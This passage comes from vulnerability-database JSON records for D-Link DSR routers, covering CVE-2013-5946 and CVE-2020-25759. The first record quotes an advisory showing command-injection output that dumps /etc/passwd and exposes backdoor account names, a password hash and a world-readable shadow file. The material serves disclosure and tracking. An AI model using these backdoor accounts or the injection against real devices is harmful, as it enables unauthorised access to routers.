cols=\"60\" wrap=\"off\" class=\"txtbox1\"\u003e\n    traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets\n     1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms\n    root:!:0:0:root:/root:/bin/sh\n    gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n    nobody:x:0:0:nobody:/nonexistent:/bin/false\n    ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n  \u0026lt;/textarea\u0026gt;\n  [...]\n  \n  \n  \n3. 
Exposure: D-Link backdoor user:\n  \n  \n* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:\n\n  root:!:0:0:root:/root:/bin/sh\n  gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n  nobody:x:0:0:nobody:/nonexistent:/bin/false\n  ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n  guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n  admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n\n* You can see the old D-Link backdoor user name \"ZX4q9Q9JUpwTZuo7\". \n  That was the account I hacked before with my previous exploit: \n  http://www.exploit-db.com/papers/22930/\n  And there is a new backdoor user \"gkJ9232xXyruTRmY\" introduced. \n  Instead of removing the backdoor, D-Link just created a new one. \n  \n* I verified this by showing the /etc/profile:\n  \n  # /etc/profile\n  LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib\n  PATH=.:/pfrm2.0/bin:$PATH\n  CLISH_PATH=/etc/clish\n  export PATH LD_LIBRARY_PATH CLISH_PATH\n  # redirect all users except root to CLI\n  if [ \"$USER\" != \"gkJ9232xXyruTRmY\" ] ; then\n  trap \"/bin/login\" SIGINT\n  trap \"\" SIGTSTP\n  /pfrm2.0/bin/cli\n  exit\n  fi\n  PS1=\u0027DSR-250N\u003e \u0027\n  \n  \n  \n4. Vulnerability: Use of weak hash algorithms:\n\n\n* In the /etc/shadow, salted DES hashes are used to store user passwords. \n  Since this hash type supports at most 8 characters, users can log in by just \n  typing the first 8 letters of their passwords when using SSH or telnet. \n  \n* An effective password length limitation of 8 characters makes brute force \n  attacks on user accounts very feasible, even if the user chose a longer \n  password. \n\n\n\n5. Exposure: Passwords are stored as plain text in config files:\n\n\n* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the \n  /tmp/system.db is built on boot time, reveals that all user passwords are \n  stored in plain text. \n\n  Example:\n\n  [...]  
\n  Users = {}\n  Users[1] = {}\n  Users[1][\"Capabilities\"] = \"\"\n  Users[1][\"DefaultUser\"] = \"1\"\n  Users[1][\"UserId\"] = \"1\"\n  Users[1][\"FirstName\"] = \"backdoor\"\n  Users[1][\"OID\"] = \"0\"\n  Users[1][\"GroupId\"] = \"1\"\n  Users[1][\"UserName\"] = \"gkJ9232xXyruTRmY\"\n  Users[1][\"Password\"] = \"thisobviouslyisafakepass\"\n  Users[1][\"UserTimeOut\"] = \"10\"\n  Users[1][\"_ROWID_\"] = \"1\"\n  Users[1][\"LastName\"] = \"ssl\"\n  [...]\n  \n  \n  \n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n* This file should have 600 permissions set and not 644. It is world readable. \n  Pointless, since every process runs as root, no user separation is \n  done anyway. \n\n  DSR-250N\u003e ls -l -a /etc/shadow\n  -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow\n  DSR-250N\u003e ps\n    PID USER       VSZ STAT COMMAND\n      1 root      2700 S    init\n      2 root         0 SW\u003c  [kthreadd]\n      3 root         0 SW\u003c  [ksoftirqd/0]\n      4 root         0 SW\u003c  [events/0]\n      5 root         0 SW\u003c  [khelper]\n      8 root         0 SW\u003c  [async/mgr]\n    111 root         0 SW\u003c  [kblockd/0]\n    120 root         0 SW\u003c  [khubd]\n    123 root         0 SW\u003c  [kseriod]\n    128 root         0 SW\u003c  [kslowd]\n    129 root         0 SW\u003c  [kslowd]\n    150 root         0 SW   [pdflush]\n    151 root         0 SW   [pdflush]\n    152 root         0 SW\u003c  [kswapd0]\n    200 root         0 SW\u003c  [aio/0]\n    210 root         0 SW\u003c  [nfsiod]\n    220 root         0 SW\u003c  [crypto/0]\n    230 root         0 SW\u003c  [cns3xxx_spi.0]\n    781 root         0 SW\u003c  [mtdblockd]\n    860 root         0 SW\u003c  [usbhid_resumer]\n    874 root         0 SW\u003c  [rpciod/0]\n    903 root         0 SWN  [jffs2_gcd_mtd4]\n    909 root         0 SWN  [jffs2_gcd_mtd5]\n    918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R\n    999 root      1816 S 
\u003c  /pfrm2.0/udev/sbin/udevd --daemon\n   1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db\n   1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db\n   1049 root      2704 S    /usr/sbin/telnetd -l /bin/login\n   1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd\n   1141 root     37000 S    /pfrm2.0/bin/sshd\n   1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5\n   1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db\n   1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5\n   1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db\n   1560 root         0 SW\u003c  [key_timehandler]\n   1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf\n   1600 root      8036 S    rvgd /tmp/system.db\n   1612 root         0 SW   [cavium]\n   1621 root      8424 S    vpnKAd /tmp/system.db\n   1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d\n   1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d\n   1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd\n   1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh\n   1771 root      2680 S    /pfrm2.0/bin/statusD\n   1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db\n   1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db\n   1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db\n   2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db\n   2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db\n   2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db\n   2205 root      1904 S    /pfrm2.0/bin/fReset\n   2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh\n   2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100\n   2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va\n   2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va\n   3355 root      1768 S    /pfrm2.0/bin/rt2860apd\n   3443 
root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va\n   3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va\n   3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var\n   3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid\n   3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c\n   3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-\n   5353 root      2704 S    -sh\n   7877 root      2568 S    sleep 60\n   7953 root      2568 S    sleep 60\n   8008 root      2704 R    ps\n  16749 root      2704 S    -sh\n  25690 root         0 SW\u003c  [RtmpCmdQTask]\n  25692 root         0 SW\u003c  [RtmpWscTask]\n  DSR-250N\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-5946",
        "trust": 3.5
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "64181",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      }
    ]
  },
  "id": "VAR-201312-0198",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:08:28.248000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Services Routers",
        "trust": 0.8,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
      },
      {
        "title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
        "trust": 0.8,
        "url": "http://www.dlink-jp.com/router-firewall"
      },
      {
        "title": "Downloads",
        "trust": 0.8,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "title": "D-Link DSR Router Remote Any Command Execution Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/41739"
      },
      {
        "title": "DSR-250N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47082"
      },
      {
        "title": "DSR-250_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47081"
      },
      {
        "title": "DSR-150N_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47080"
      },
      {
        "title": "DSR-150_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47079"
      },
      {
        "title": "DSR-150_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47078"
      },
      {
        "title": "DSR-1000_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47085"
      },
      {
        "title": "DSR-500N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47084"
      },
      {
        "title": "DSR-500_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47083"
      },
      {
        "title": "DSR-1000N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47086"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5946"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5946"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/64181"
      },
      {
        "trust": 0.3,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.exploit-db.com/papers/22930/"
      },
      {
        "trust": 0.1,
        "url": "http://tsd.dlink.com.tw"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5946"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5945"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948",
        "ident": null
      },
      {
        "db": "BID",
        "id": "64181",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-65948",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64181",
        "ident": null
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "ident": null
      },
      {
        "date": "2013-12-07T17:10:52",
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "ident": null
      },
      {
        "date": "2013-12-19T04:24:51.930000",
        "db": "NVD",
        "id": "CVE-2013-5946",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-65948",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64181",
        "ident": null
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "ident": null
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "ident": null
      },
      {
        "date": "2024-11-21T01:58:28.360000",
        "db": "NVD",
        "id": "CVE-2013-5946",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "Vulnerability to execute arbitrary commands in firmware of multiple D-Link router products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "operating system command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ],
    "trust": 0.6
  }
}

var-202012-0333
Vulnerability from variot

An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests. D-Link DSR-250 devices contain an input validation flaw and an OS command injection vulnerability. As a result, information may be obtained or tampered with, and the device may be put into a denial-of-service (DoS) state. The affected-product list in this record also names other DSR-series models, most of them scoped to firmware 3.17 and earlier. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering.

D-Link DSR-250 3.17 has a command injection vulnerability in the Unified Services Router web interface. Attackers can use this vulnerability to execute arbitrary commands.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-0333",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "*"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "3.17"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "cve": "CVE-2020-25759",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CVE-2020-25759",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2020-72723",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2020-25759",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-25759",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-25759",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2020-25759",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-72723",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-1105",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests. D-Link DSR-250 The device is vulnerable to input verification, and OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering. \n\r\n\r\nD-Link DSR-250 3.17 has a command injection vulnerability in the Unified Services Router web interface. Attackers can use this vulnerability to execute arbitrary commands",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25759",
        "trust": 3.0
      },
      {
        "db": "DLINK",
        "id": "SAP10195",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "id": "VAR-202012-0333",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:11:14.751000Z",
  "patch": {
    "@context": {
